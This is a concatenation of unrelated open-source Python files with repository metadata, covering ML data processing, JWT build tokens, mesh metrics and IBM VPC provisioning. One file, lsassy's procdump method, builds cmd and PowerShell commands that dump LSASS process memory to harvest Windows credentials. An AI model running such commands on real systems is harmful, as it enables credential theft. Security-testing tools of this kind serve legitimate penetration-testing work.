np.savez_compressed(file=filename, **dict(kwargs))
# Clear recorded values
for recorded in self.recorded.values():
recorded.clear()
if self._is_agent:
return reward, terminal, parallel
else:
return 0
def _process_states_input(self, states, function_name):
if self.states_spec.is_singleton() and not isinstance(states, dict) and not (
util.is_iterable(x=states) and isinstance(states[0], dict)
):
# Single state
states = np.asarray(states)
if states.shape == self.states_spec.value().shape:
# Single state is not batched
states = ArrayDict(singleton=np.expand_dims(states, axis=0))
batched = False
num_instances = 1
is_iter_of_dicts = None
else:
# Single state is batched, iter[state]
assert states.shape[1:] == self.states_spec.value().shape
assert type(states) in (tuple, list, np.ndarray)
num_instances = states.shape[0]
states = ArrayDict(singleton=states)
batched = True
is_iter_of_dicts = True # Default
elif util.is_iterable(x=states):
# States is batched, iter[dict[state]]
batched = True
num_instances = len(states)
is_iter_of_dicts = True
assert type(states) in (tuple, list)
if num_instances == 0:
raise TensorforceError.value(
name=function_name, argument='len(states)', value=num_instances, hint='= 0'
)
for n, state in enumerate(states):
if not isinstance(state, dict):
raise TensorforceError.type(
name=function_name, argument='states[{}]'.format(n), dtype=type(state),
hint='is not dict'
)
# Turn iter of dicts into dict of arrays
# (Doesn't use self.states_spec since states also contains auxiliaries)
states = [ArrayDict(state) for state in states]
states = states[0].fmap(
function=(lambda *xs: np.stack(xs, axis=0)), zip_values=states[1:]
)
elif isinstance(states, dict):
# States is dict, turn into arrays
states = ArrayDict(states)
name, spec = self.states_spec.item()
if name is None:
name = 'state'
if states[name].shape == spec.shape:
# States is not batched, dict[state]
states = states.fmap(function=(lambda state: np.expand_dims(state, axis=0)))
batched = False
num_instances = 1
is_iter_of_dicts = None
else:
# States is batched, dict[iter[state]]
assert states[name].shape[1:] == spec.shape
assert type(states[name]) in (tuple, list, np.ndarray)
batched = True
num_instances = states[name].shape[0]
is_iter_of_dicts = False
if num_instances == 0:
raise TensorforceError.value(
name=function_name, argument='len(states)', value=num_instances, hint='= 0'
)
else:
raise TensorforceError.type(
name=function_name, argument='states', dtype=type(states),
hint='is not array/tuple/list/dict'
)
# Check number of inputs
if any(state.shape[0] != num_instances for state in states.values()):
raise TensorforceError.value(
name=function_name, argument='len(states)',
value=[state.shape[0] for state in states.values()], hint='inconsistent'
)
return states, batched, num_instances, is_iter_of_dicts
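# Hedged inspection sketch (not part of the original module): traces written
# by the recorder above are ordinary .npz archives named trace-<episode>.npz
# inside the configured recorder directory, so they can be inspected with
# numpy alone; the path below is illustrative.
def _inspect_trace(path="traces/trace-000000000.npz"):
    trace = np.load(path)
    # Keys mirror the recorded structure: per-state/per-action arrays plus
    # the terminal and reward sequences concatenated across episodes.
    return {name: trace[name].shape for name in trace.files}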
|
257be356c7486df24bdcdf3eb9f3058c98b792ed
|
65c8f01506df85ffa42094c45a844d4262f398e2
|
/tools/todos.py
|
8d0c665409108afb7044e65bfb848c752696fc9d
|
[
"Apache-2.0"
] |
permissive
|
robocorp/rpaframework
|
da4b523c76f18967d7a267f571b8a64d661dc1c8
|
321efaa3bb85e8bf1a4be8e1f1720ad9230dd962
|
refs/heads/master
| 2023-09-05T20:25:53.305425
| 2023-09-04T16:49:28
| 2023-09-04T16:49:28
| 231,374,845
| 852
| 164
|
Apache-2.0
| 2023-09-14T09:11:30
| 2020-01-02T12:11:15
|
Python
|
UTF-8
|
Python
| false
| false
| 2,239
|
py
|
todos.py
|
#!/usr/bin/env python3
import argparse
import json
import os
import re
import sys
from collections import defaultdict
from contextlib import contextmanager
from io import StringIO
from pathlib import Path
from pylint.lint import Run
TODO_PATTERN = re.compile(r"(todo|fixme|xxx)[\:\.]?\s*(.+)", re.IGNORECASE)
@contextmanager
def redirect():
stdout = sys.stdout
sys.stdout = StringIO()
try:
yield sys.stdout
finally:
sys.stdout.close()
sys.stdout = stdout
def todo_msg(msg):
match = TODO_PATTERN.match(msg)
if match:
return match.group(2)
else:
return msg
def main():
parser = argparse.ArgumentParser(description="Write all todo items as rst")
parser.add_argument("input", help="Path to source files")
parser.add_argument("output", help="Path to output rst file")
args = parser.parse_args()
cmd = [
"pylint",
"--disable=all",
"--enable=fixme",
"--exit-zero",
"-f",
"json",
Path(args.input).name,
]
cwd = os.getcwd()
os.chdir(Path(args.input).parent)
try:
with redirect() as stdout:
Run(cmd, exit=False)
result = json.loads(stdout.getvalue())
finally:
os.chdir(cwd)
todos = defaultdict(list)
for item in result:
# Remove given search path from module path
name = ".".join(item["module"].split(".")[1:])
        message = todo_msg(item["message"])
        todos[name].append({"message": message, "line": item["line"]})
output = ["****", "TODO", "****", ""]
for module, items in sorted(todos.items()):
items.sort(key=lambda item: item["line"])
output.append(f"{module}:")
output.append("=" * (len(module) + 1))
output.append("")
output.append(".. csv-table::")
output.append(' :header: "Line", "Message"')
output.append(" :widths: 10, 40")
output.append("")
for item in items:
output.append(' "{line}", "{message}"'.format(**item))
output.append("")
with open(args.output, "w") as outfile:
outfile.write("\n".join(output))
if __name__ == "__main__":
main()
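# Example invocation (illustrative paths): collect the TODO/FIXME/XXX
# comments pylint finds under ./src and render them as an rst document:
#   python tools/todos.py src docs/source/todos.rst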
|
188c60d383655b241199d837a544c7f8f35b378d
|
52a677b94056d3397b4a499bc9185adb68a63f05
|
/buildman/build_token.py
|
2b3b3e0819681ae0c1da6dfd89cc124962e621a4
|
[
"Apache-2.0"
] |
permissive
|
quay/quay
|
9b6fcff54efc0dbf7c6d91fa80676950555b6f1a
|
e400a0c22c5f89dd35d571654b13d262b1f6e3b3
|
refs/heads/master
| 2023-08-28T15:08:38.001842
| 2023-08-28T13:52:31
| 2023-08-28T13:52:31
| 220,517,730
| 2,363
| 322
|
Apache-2.0
| 2023-09-14T17:43:48
| 2019-11-08T17:37:05
|
Python
|
UTF-8
|
Python
| false
| false
| 3,719
|
py
|
build_token.py
|
import logging
import jsonschema
import jwt
from app import instance_keys
from util.security import jwtutil
from util.security.registry_jwt import (
ALGORITHM,
JWT_CLOCK_SKEW_SECONDS,
InvalidBearerTokenException,
generate_bearer_token,
)
logger = logging.getLogger(__name__)
ANONYMOUS_SUB = "(anonymous)"
BUILD_JOB_REGISTRATION_TYPE = "build_job_registration"
BUILD_JOB_TOKEN_TYPE = "build_job_token"
BUILD_TOKEN_CONTEXT_SCHEMA = {
"type": "object",
"description": "Build context",
"required": ["token_type", "build_id", "job_id", "expiration"],
"properties": {
"token_type": {
"type": "string",
"description": "The build token type",
},
"build_id": {
"type": "string",
"description": "The build id",
},
"job_id": {
"type": "string",
"description": "The job id",
},
"expiration": {
"type": "number",
"description": "The number of seconds until the job expires",
},
},
}
class InvalidBuildTokenException(Exception):
pass
def build_token(aud, token_type, build_id, job_id, expiration, instance_keys):
"""Returns an encoded JWT for the given build, signed by the local instance's private."""
token_data = {
"token_type": token_type,
"build_id": build_id,
"job_id": job_id,
"expiration": expiration,
}
token = generate_bearer_token(aud, ANONYMOUS_SUB, token_data, {}, expiration, instance_keys)
return token
def verify_build_token(token, aud, token_type, instance_keys):
"""Verify the JWT build token."""
try:
headers = jwt.get_unverified_header(token)
except jwtutil.InvalidTokenError as ite:
logger.error("Invalid token reason: %s", ite)
raise InvalidBuildTokenException(ite)
kid = headers.get("kid", None)
if kid is None:
logger.error("Missing kid header on encoded JWT: %s", token)
raise InvalidBuildTokenException("Missing kid header")
public_key = instance_keys.get_service_key_public_key(kid)
if public_key is None:
logger.error("Could not find requested service key %s with encoded JWT: %s", kid, token)
raise InvalidBuildTokenException("Unknown service key")
try:
payload = jwtutil.decode(
token,
public_key,
verify=True,
algorithms=[ALGORITHM],
audience=aud,
issuer=instance_keys.service_name,
leeway=JWT_CLOCK_SKEW_SECONDS,
)
except jwtutil.InvalidTokenError as ite:
logger.error("Invalid token reason: %s", ite)
raise InvalidBuildTokenException(ite)
if "sub" not in payload:
raise InvalidBuildTokenException("Missing sub field in JWT")
if payload["sub"] != ANONYMOUS_SUB:
raise InvalidBuildTokenException("Wrong sub field in JWT")
if (
"context" not in payload
or not payload["context"]["token_type"]
or not payload["context"]["build_id"]
or not payload["context"]["job_id"]
or not payload["context"]["expiration"]
):
raise InvalidBuildTokenException("Missing context field in JWT")
try:
jsonschema.validate(payload["context"], BUILD_TOKEN_CONTEXT_SCHEMA)
except jsonschema.ValidationError:
raise InvalidBuildTokenException(
"Unable to validate build token context schema: malformed context"
)
if payload["context"]["token_type"] != token_type:
raise InvalidBuildTokenException(
"Build token type in JWT does not match expected type: %s" % token_type
)
return payload
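# Hedged round-trip sketch (not part of the original module): issuing a job
# token and verifying it with the same instance keys. The audience and
# build/job ids below are illustrative.
def _sketch_token_round_trip():
    token = build_token(
        "quay.example.com",
        BUILD_JOB_TOKEN_TYPE,
        build_id="build-1",
        job_id="job-1",
        expiration=300,
        instance_keys=instance_keys,
    )
    payload = verify_build_token(
        token, "quay.example.com", BUILD_JOB_TOKEN_TYPE, instance_keys
    )
    return payload["context"]["job_id"]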
|
f0e49480c1d45e6eee586adfab11b138acbb47ea
|
136cf91ce80e12dde9bfc3f9d0c5940fe8a789bb
|
/fitting/measure.py
|
b56d48dd80e240e0c4b7fef64cb0913f4627efa6
|
[
"CC-BY-4.0"
] |
permissive
|
Rubikplayer/flame-fitting
|
e80087365cd21c2afbb053ef8013faba23a08a78
|
ca806ce13a8964231136bd226bf3255fc2e476de
|
refs/heads/master
| 2023-08-12T18:46:02.697078
| 2022-12-30T15:38:40
| 2022-12-30T15:38:40
| 111,953,122
| 601
| 109
| null | 2023-02-16T02:19:52
| 2017-11-24T20:23:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
measure.py
|
'''
Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG) is holder of all proprietary rights on this computer program.
Using this computer program means that you agree to the terms in the LICENSE file (https://flame.is.tue.mpg.de/modellicense) included
with the FLAME model. Any use not explicitly granted by the LICENSE is prohibited.
Copyright 2020 Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG). acting on behalf of its
Max Planck Institute for Intelligent Systems. All rights reserved.
More information about FLAME is available at http://flame.is.tue.mpg.de.
For comments or questions, please email us at flame@tue.mpg.de
'''
import numpy as np
import matplotlib as mpl
import matplotlib.cm as cm
# -----------------------------------------------------------------------------
def mesh2mesh( mesh_v_1, mesh_v_2 ):
    return np.linalg.norm( mesh_v_2 - mesh_v_1, axis=1 )
# -----------------------------------------------------------------------------
def distance2color( dist, vmin=0, vmax=0.001, cmap_name='jet' ):
# vmin, vmax in meters
norm = mpl.colors.Normalize( vmin=vmin, vmax=vmax )
cmap = cm.get_cmap( name=cmap_name )
colormapper = cm.ScalarMappable( norm=norm, cmap=cmap )
rgba = colormapper.to_rgba( dist )
color_3d = rgba[:,0:3]
return color_3d
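# Hedged usage sketch: per-vertex distances between two aligned meshes mapped
# to RGB colors; the vertex arrays below are synthetic stand-ins for real
# FLAME meshes.
if __name__ == '__main__':
    verts_a = np.zeros( (10, 3) )
    verts_b = verts_a + 1e-4
    colors = distance2color( mesh2mesh( verts_a, verts_b ) )
    print( colors.shape ) # (10, 3)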
|
4a4bd5ff67b669d9ad56778b06644fcdd52bc1e4
|
3ea12bf1031313a823de4e02e008d9e98eeaadfa
|
/lsassy/dumpmethod/procdump.py
|
29362be5c87305a4bc38d7c2ff5fac85f893cfeb
|
[
"MIT"
] |
permissive
|
Hackndo/lsassy
|
85ef24b9a32a7eb428f338a839ed8504d0739695
|
4b1ddf1b3491b014aa27a68f3aa26cb0c962b0a5
|
refs/heads/master
| 2023-08-23T02:10:16.789757
| 2023-06-30T20:06:09
| 2023-06-30T20:06:09
| 225,634,372
| 1,700
| 215
|
MIT
| 2023-06-22T18:42:56
| 2019-12-03T14:03:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,158
|
py
|
procdump.py
|
from lsassy.dumpmethod import IDumpMethod, Dependency
class DumpMethod(IDumpMethod):
custom_dump_ext_support = False
dump_ext = "dmp"
def __init__(self, session, timeout, time_between_commands):
super().__init__(session, timeout, time_between_commands)
self.procdump = Dependency("procdump", "procdump.exe")
def prepare(self, options):
return self.prepare_dependencies(options, [self.procdump])
def clean(self):
self.clean_dependencies([self.procdump])
def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
cmd_command = """for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do {} -accepteula -o -ma %J {}{}""".format(
self.procdump.get_remote_path(),
self.dump_path, self.dump_name
)
pwsh_command = """{} -accepteula -o -ma (Get-Process lsass).Id {}{}""".format(
self.procdump.get_remote_path(),
self.dump_path, self.dump_name
)
return {
"cmd": cmd_command,
"pwsh": pwsh_command
}
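# For illustration only (paths hypothetical): with procdump uploaded to
# C:\Windows\Temp\procdump.exe and a dump path of C:\Temp\, the powershell
# variant above renders roughly as:
#   C:\Windows\Temp\procdump.exe -accepteula -o -ma (Get-Process lsass).Id C:\Temp\lsass.dmp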
|
62c648bb9667561e01d88372cfe4f5f2d1704ff4
|
fb1e852da0a026fb59c8cb24aeb40e62005501f1
|
/edgelm/examples/wav2vec/vq-wav2vec_featurize.py
|
7b025f18b5b13eb562e904a5cfd9e31cb934f02d
|
[
"LGPL-2.1-or-later",
"LicenseRef-scancode-free-unknown",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
microsoft/unilm
|
134aa44867c5ed36222220d3f4fd9616d02db573
|
b60c741f746877293bb85eed6806736fc8fa0ffd
|
refs/heads/master
| 2023-08-31T04:09:05.779071
| 2023-08-29T14:07:57
| 2023-08-29T14:07:57
| 198,350,484
| 15,313
| 2,192
|
MIT
| 2023-08-19T11:33:20
| 2019-07-23T04:15:28
|
Python
|
UTF-8
|
Python
| false
| false
| 7,930
|
py
|
vq-wav2vec_featurize.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Helper script to pre-compute embeddings for a flashlight (previously called wav2letter++) dataset
"""
import argparse
import glob
import os
import os.path as osp
import pprint
import soundfile as sf
import torch
import fairseq
from torch import nn
from torch.utils.data import DataLoader
try:
import tqdm
except ImportError:
print("Install tqdm to use --log-format=tqdm")
class FilesDataset:
def __init__(self, files, labels):
self.files = files
if labels and osp.exists(labels):
with open(labels, "r") as lbl_f:
self.labels = [line.rstrip() for line in lbl_f]
else:
self.labels = labels
def __len__(self):
return len(self.files)
def __getitem__(self, index):
fname = self.files[index]
wav, sr = sf.read(fname)
assert sr == 16000
wav = torch.from_numpy(wav).float()
lbls = None
if self.labels:
if isinstance(self.labels, str):
lbl_file = osp.splitext(fname)[0] + "." + self.labels
with open(lbl_file, "r") as lblf:
lbls = lblf.readline()
assert lbls is not None
else:
lbls = self.labels[index]
return wav, lbls
def collate(self, batch):
return batch
class ArgTypes:
@staticmethod
def existing_path(arg):
arg = str(arg)
assert osp.exists(arg), f"File {arg} does not exist"
return arg
@staticmethod
def mkdir(arg):
arg = str(arg)
os.makedirs(arg, exist_ok=True)
return arg
class DatasetWriter:
def __init__(self):
self.args = self.load_config()
pprint.pprint(self.args.__dict__)
self.model = self.load_model()
def __getattr__(self, attr):
return getattr(self.args, attr)
def read_manifest(self, fname):
with open(fname, "r") as fp:
lines = fp.read().split("\n")
root = lines.pop(0).strip()
fnames = [
osp.join(root, line.split("\t")[0]) for line in lines if len(line) > 0
]
return fnames
def process_splits(self):
if self.args.shard is not None or self.args.num_shards is not None:
assert self.args.shard is not None and self.args.num_shards is not None
for split in self.splits:
print(split)
if self.extension == "tsv":
datadir = osp.join(self.data_dir, f"{split}.{self.extension}")
print("Reading manifest file: ", datadir)
files = self.read_manifest(datadir)
else:
datadir = osp.join(self.data_dir, split, f"**/*.{self.extension}")
files = glob.glob(datadir, recursive=True)
assert len(files) > 0
if self.args.shard is not None:
files = files[self.args.shard :: self.args.num_shards]
lbls = []
with open(self.data_file(split), "w") as srcf:
for line, lbl in self.iterate(files):
print(line, file=srcf)
if self.args.labels:
lbls.append(lbl + "\n")
if self.args.labels:
assert all(a is not None for a in lbls)
with open(self.lbl_file(split), "w") as lblf:
lblf.writelines(lbls)
def iterate(self, files):
data = self.load_data(files)
for samples in tqdm.tqdm(data, total=len(files) // 32):
for wav, lbl in samples:
x = wav.unsqueeze(0).float().cuda()
div = 1
while x.size(-1) // div > self.args.max_size:
div += 1
xs = x.chunk(div, dim=-1)
result = []
for x in xs:
torch.cuda.empty_cache()
x = self.model.feature_extractor(x)
if self.quantize_location == "encoder":
with torch.no_grad():
_, idx = self.model.vector_quantizer.forward_idx(x)
idx = idx.squeeze(0).cpu()
else:
with torch.no_grad():
z = self.model.feature_aggregator(x)
_, idx = self.model.vector_quantizer.forward_idx(z)
idx = idx.squeeze(0).cpu()
result.append(idx)
idx = torch.cat(result, dim=0)
yield " ".join("-".join(map(str, a.tolist())) for a in idx), lbl
def lbl_file(self, name):
shard_part = "" if self.args.shard is None else f".{self.args.shard}"
return osp.join(self.output_dir, f"{name}.lbl{shard_part}")
def data_file(self, name):
shard_part = "" if self.args.shard is None else f".{self.args.shard}"
return osp.join(self.output_dir, f"{name}.src{shard_part}")
def var_file(self):
        return osp.join(self.output_dir, "vars.pt")
def load_config(self):
parser = argparse.ArgumentParser("Vector Quantized wav2vec features")
# Model Arguments
parser.add_argument("--checkpoint", type=ArgTypes.existing_path, required=True)
parser.add_argument("--data-parallel", action="store_true")
# Output Arguments
parser.add_argument("--output-dir", type=ArgTypes.mkdir, required=True)
# Data Arguments
parser.add_argument("--data-dir", type=ArgTypes.existing_path, required=True)
parser.add_argument("--splits", type=str, nargs="+", required=True)
parser.add_argument("--extension", type=str, required=True)
parser.add_argument("--labels", type=str, required=False)
parser.add_argument("--shard", type=int, default=None)
parser.add_argument("--num-shards", type=int, default=None)
parser.add_argument("--max-size", type=int, default=1300000)
# Logger Arguments
parser.add_argument(
"--log-format", type=str, choices=["none", "simple", "tqdm"]
)
return parser.parse_args()
def load_data(self, fnames):
dataset = FilesDataset(fnames, self.args.labels)
loader = DataLoader(
dataset, batch_size=32, collate_fn=dataset.collate, num_workers=8
)
return loader
def load_model(self):
model, cfg, task = fairseq.checkpoint_utils.load_model_ensemble_and_task([self.checkpoint])
model = model[0]
self.quantize_location = getattr(cfg.model, "vq", "encoder")
model.eval().float()
model.cuda()
if self.data_parallel:
model = nn.DataParallel(model)
return model
def __call__(self):
self.process_splits()
if hasattr(self.model.feature_extractor, "vars") and (
self.args.shard is None or self.args.shard == 0
):
vars = (
self.model.feature_extractor.vars.view(
self.model.feature_extractor.banks,
self.model.feature_extractor.num_vars,
-1,
)
.cpu()
.detach()
)
print("writing learned latent variable embeddings: ", vars.shape)
torch.save(vars, self.var_file())
if __name__ == "__main__":
write_data = DatasetWriter()
write_data()
print("Done.")
|
605f520e29fe21f8f8c5f51a1cb7fa4671056bea
|
b347bc4b850dee4a8a9a171b563a3f31230ce1c7
|
/sktime/transformations/series/detrend/__init__.py
|
875d1041766b230516709cb3fc36e97ce6a36da3
|
[
"BSD-3-Clause"
] |
permissive
|
sktime/sktime
|
5963962df338c5931a2f9f1794d1203c50ddc27e
|
70b2bfaaa597eb31bc3a1032366dcc0e1f4c8a9f
|
refs/heads/main
| 2023-08-22T18:20:08.022950
| 2023-08-22T15:24:39
| 2023-08-22T15:24:39
| 156,401,841
| 1,117
| 268
|
BSD-3-Clause
| 2023-09-14T20:44:21
| 2018-11-06T15:08:24
|
Python
|
UTF-8
|
Python
| false
| false
| 490
|
py
|
__init__.py
|
# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
"""Transformer module for detrending and deseasonalization."""
__author__ = ["mloning", "eyalshafran", "SveaMeyer13"]
__all__ = ["Detrender", "Deseasonalizer", "ConditionalDeseasonalizer", "STLTransformer"]
from sktime.transformations.series.detrend._deseasonalize import (
ConditionalDeseasonalizer,
Deseasonalizer,
STLTransformer,
)
from sktime.transformations.series.detrend._detrend import Detrender
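# Hedged usage sketch: the re-exported transformers follow sktime's usual
# fit/transform API, e.g. removing a fitted trend from a series y:
#   from sktime.transformations.series.detrend import Detrender
#   y_detrended = Detrender().fit_transform(y)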
|
557b2156663048e0c0e77d63bf19f245dad82fcf
|
fad4aa5a174627b8930beb8f5f987dd62c88957e
|
/sky/skylet/providers/ibm/vpc_provider.py
|
6d691b765f790293820d514d7c1ad0cff62cf162
|
[
"Apache-2.0"
] |
permissive
|
skypilot-org/skypilot
|
603e29ecb3ce3b25d308f018fd402488ee352ef0
|
e58f33f315ca08c6e057ab9a2d00cd27476529a1
|
refs/heads/master
| 2023-08-16T21:46:53.379586
| 2023-08-16T02:17:21
| 2023-08-16T02:17:21
| 395,140,743
| 3,416
| 220
|
Apache-2.0
| 2023-09-14T21:20:44
| 2021-08-11T23:32:15
|
Python
|
UTF-8
|
Python
| false
| false
| 34,630
|
py
|
vpc_provider.py
|
"""
Module allocating a VPC - the network namespace and configuration
for Ray's cluster. Used by the node_provider module to group the
nodes under the same subnet, tagged with the same cluster name.
"""
import copy
import json
import textwrap
import time
import uuid
from concurrent.futures import ThreadPoolExecutor
import requests
from sky.adaptors import ibm
from sky.skylet.providers.ibm.utils import RAY_RECYCLABLE, get_logger
# pylint: disable=line-too-long
logger = get_logger("vpc_provider_")
REQUIRED_RULES = {
"outbound_tcp_all": "selected security group is missing rule permitting outbound TCP access\n",
"outbound_udp_all": "selected security group is missing rule permitting outbound UDP access\n",
"inbound_tcp_sg": "selected security group is missing rule permitting inbound tcp traffic inside selected security group\n",
"inbound_tcp_22": "selected security group is missing rule permitting inbound traffic to tcp port 22 required for ssh\n",
}
INSECURE_RULES = {
"inbound_tcp_6379": "selected security group is missing rule permitting inbound traffic to tcp port 6379 required for Redis\n",
"inbound_tcp_8265": "selected security group is missing rule permitting inbound traffic to tcp port 8265 required to access Ray Dashboard\n",
}
REQUIRED_RULES.update(INSECURE_RULES)
class IBMVPCProvider:
"""
Manages a vpc containing the network configuration for the cluster's nodes.
"""
def __init__(self, resource_group_id, region, cluster_name):
self.vpc_client = ibm.client(region=region)
self.search_client = ibm.search_client()
self.tagging_client = ibm.tagging_client()
self.resource_group_id = resource_group_id
self.cluster_name = cluster_name
## region and zone might change between failovers
self.region = None
self.zone = None
def create_or_fetch_vpc(self, region, zone):
"""
returns a cluster with tag matching the cluster name if exists, else creates one.
an entry point (out of 2) to this module.
"""
# refresh client region scope if region changed.
if self.region and self.region != region:
self.vpc_client = ibm.client(region=region)
self.region = region
self.zone = zone
reused_vpc_data = None
# pylint: disable=line-too-long
vpcs_filtered_by_tags_and_region = self.search_client.search(
query=f"type:vpc AND tags:{self.cluster_name} AND region:{self.region}",
fields=["tags", "region", "type"],
limit=1000,
).get_result()["items"]
for vpc in vpcs_filtered_by_tags_and_region:
vpc_id = vpc["crn"].rsplit(":", 1)[-1]
vpc_data = self.get_vpc_data(vpc_id, self.region)
if vpc_data["status"] == "available":
reused_vpc_data = vpc_data
break
# found vpc tagged with cluster name in the required region
if reused_vpc_data:
# using self.region since tagged vpc is in the same region
subnets = self.get_vpc_subnets(reused_vpc_data, self.region)
subnet_in_zone = next(
(subnet for subnet in subnets if subnet["zone"]["name"] == self.zone),
None,
)
# found a subnet in the required zone
if subnet_in_zone:
subnet_id = subnet_in_zone["id"]
public_gateway = subnet_in_zone.get("public_gateway")
if not public_gateway:
public_gateway = self.create_public_gateway(
reused_vpc_data["id"], self.zone, subnet_in_zone
)
# tagged vpc found doesn't have a subnet in the required zone
else:
subnet_data = self.create_subnet(reused_vpc_data["id"], self.zone)
subnet_id = subnet_data["id"]
public_gateway = self.create_public_gateway(
reused_vpc_data["id"], self.zone, subnet_data
)
            # add missing security group rules if needed
            security_group = reused_vpc_data.get("default_security_group")
            sg_id = security_group["id"] if security_group else None
            if sg_id:
                self.add_missing_sg_rules(sg_id)
# managed to reuse found VPC
logger.info(
f"Reusing VPC {reused_vpc_data['id']} named: {reused_vpc_data['name']}"
)
return {
"vpc_id": reused_vpc_data["id"],
"subnet_id": subnet_id,
"security_group_id": sg_id,
}
# delete a tagged vpc that doesn't meet requirements
if reused_vpc_data:
self.delete_vpc(reused_vpc_data["id"], self.region)
# create a new vpc
vpc_tags = self.create_vpc()
return vpc_tags
def create_vpc(self):
"""creates a vpc, tags it and return key values pertaining it.
uuid is added to vpc name to avoid naming collision.
vpc is tagged using the exact cluster name, as appears on
the cluster's config file.
Returns:
dict: containing the keys: vpc_id, subnet_id
and security_group_id
"""
vpc_data = self.vpc_client.create_vpc(
address_prefix_management="auto",
classic_access=False,
name=f"sky-vpc-{self.cluster_name}-{str(uuid.uuid4())[:5]}",
resource_group={"id": self.resource_group_id},
).get_result()
subnet_data = self.create_subnet(vpc_data["id"], self.zone)
self.create_public_gateway(vpc_data["id"], self.zone, subnet_data)
sg_id = self.create_sg_rules(vpc_data)
# tag vpc with the cluster's name
resource_model = {"resource_id": vpc_data["crn"]}
self.tagging_client.attach_tag(
resources=[resource_model], tag_names=[self.cluster_name], tag_type="user"
).get_result()
return {
"vpc_id": vpc_data["id"],
"subnet_id": subnet_data["id"],
"security_group_id": sg_id,
}
def create_subnet(self, vpc_id, zone_name):
ipv4_cidr_block = None
subnet_name = f"sky-subnet-{self.cluster_name}-{str(uuid.uuid4())[:5]}"
res = self.vpc_client.list_vpc_address_prefixes(vpc_id).get_result()
# searching for the CIDR block (internal ip range) matching the
# specified zone of a VPC (whose region has already been set)
address_prefixes = res["address_prefixes"]
ipv4_cidr_block = next(
(
address_prefix["cidr"]
for address_prefix in address_prefixes
if address_prefix["zone"]["name"] == zone_name
),
None,
)
if not ipv4_cidr_block:
raise Exception(
"Failed to locate a cidr block "
f"Matching the zone name: {zone_name} to create "
"a subnet"
)
subnet_prototype = {}
subnet_prototype["zone"] = {"name": zone_name}
subnet_prototype["ip_version"] = "ipv4"
subnet_prototype["name"] = subnet_name
subnet_prototype["resource_group"] = {"id": self.resource_group_id}
subnet_prototype["vpc"] = {"id": vpc_id}
subnet_prototype["ipv4_cidr_block"] = ipv4_cidr_block
subnet_data = self.vpc_client.create_subnet(subnet_prototype).get_result()
return subnet_data
def create_public_gateway(self, vpc_id, zone_name, subnet_data):
gateway_prototype = {}
gateway_prototype["vpc"] = {"id": vpc_id}
gateway_prototype["zone"] = {"name": zone_name}
gateway_prototype["name"] = f"{subnet_data['name']}-gw"
gateway_prototype["resource_group"] = {"id": self.resource_group_id}
gateway_data = self.vpc_client.create_public_gateway(
**gateway_prototype
).get_result()
gateway_id = gateway_data["id"]
self.vpc_client.set_subnet_public_gateway(subnet_data["id"], {"id": gateway_id})
return gateway_id
def create_sg_rules(self, vpc_data):
sg_id = vpc_data["default_security_group"]["id"]
sg_name = f"{self.cluster_name}-{str(uuid.uuid4())[:5]}-sg"
# update sg name
self.vpc_client.update_security_group(
sg_id, security_group_patch={"name": sg_name}
)
# open private tcp traffic between VSIs within the security group
sg_rule_prototype = _build_security_group_rule_prototype_model(
"inbound_tcp_sg", sg_id=sg_id
)
self.vpc_client.create_security_group_rule(
sg_id, sg_rule_prototype
).get_result()
# add all other required rules configured by the specific backend
for rule in REQUIRED_RULES.keys():
sg_rule_prototype = _build_security_group_rule_prototype_model(rule)
if sg_rule_prototype:
self.vpc_client.create_security_group_rule(
sg_id, sg_rule_prototype
).get_result()
return sg_id
def get_vpc_data(self, vpc_id, region):
"""returns vpc data if exists, else None"""
if not vpc_id:
return None
tmp_vpc_client = ibm.client(region=region)
try:
vpc_data = tmp_vpc_client.get_vpc(vpc_id).result
return vpc_data
except ibm.ibm_cloud_sdk_core.ApiException as e:
if e.code == 404:
logger.debug("VPC doesn't exist.")
return None
else:
raise
def get_vpc_subnets(self, vpc_data, region, field=""):
"""return data on subnets belonging to specified vpc within
the specified region.
if 'field' is specified narrowing data returned to
data['field'] (for each subnet)
Args:
vpc_data (str): vpc data as received from vpc client.
region (str): ibm vpc region.
field (str, optional): field within the subnet data response from vpc
client's list_subnets()/get_subnet() response. Defaults to ''.
Returns:
str: data on all subnets belonging to the specified vpc.
"""
if not vpc_data:
return None
# pylint: disable=line-too-long
tmp_vpc_client = ibm.client(region=region)
subnets_attached_to_routing_table = tmp_vpc_client.list_subnets(
routing_table_id=vpc_data["default_routing_table"]["id"]
).get_result()["subnets"]
if field:
return [subnet[field] for subnet in subnets_attached_to_routing_table]
else:
return subnets_attached_to_routing_table
def delete_vpc(self, vpc_id, region):
"""
deletes a vpc with the specified id and region.
an entry point to this module (alongside create_or_fetch_vpc)
"""
logger.debug(f"Deleting vpc: {vpc_id}")
tmp_vpc_client = ibm.client(region=region)
vpc_data = self.get_vpc_data(vpc_id, region)
if not vpc_data:
            logger.warning(f"vpc:{vpc_id} is set for deletion, but wasn't found")
return None
self.delete_vms(tmp_vpc_client, vpc_id)
self.delete_subnets(tmp_vpc_client, vpc_data, region)
self.delete_gateways(tmp_vpc_client, vpc_id)
# at this point vpc was already verified to be existing
# thus no relevant exception to catch when deleting.
tmp_vpc_client.delete_vpc(vpc_id)
def delete_vms(self, vpc_client, vpc_id):
def _poll_vpc_contains_vms(vpc_id):
tries = 60
sleep_interval = 3
while tries:
# list_instances() never raise an exception, check values instead
res = vpc_client.list_instances(vpc_id=vpc_id).get_result()
if not res["total_count"]:
return True
else:
tries -= 1
time.sleep(sleep_interval)
raise Exception(
"Failed to delete VPC's instances within "
"the expected time frame. Cannot "
"continue to delete VPC."
)
def _del_instance(vm_data):
# first delete ips created by node_provider
nic_id = vm_data["network_interfaces"][0]["id"]
res = vpc_client.list_instance_network_interface_floating_ips(
vm_data["id"], nic_id
).get_result()
floating_ips = res.get("floating_ips", [])
for ip in floating_ips:
if ip["name"].startswith(RAY_RECYCLABLE):
logger.debug(f"Deleting IP: {ip['id']}")
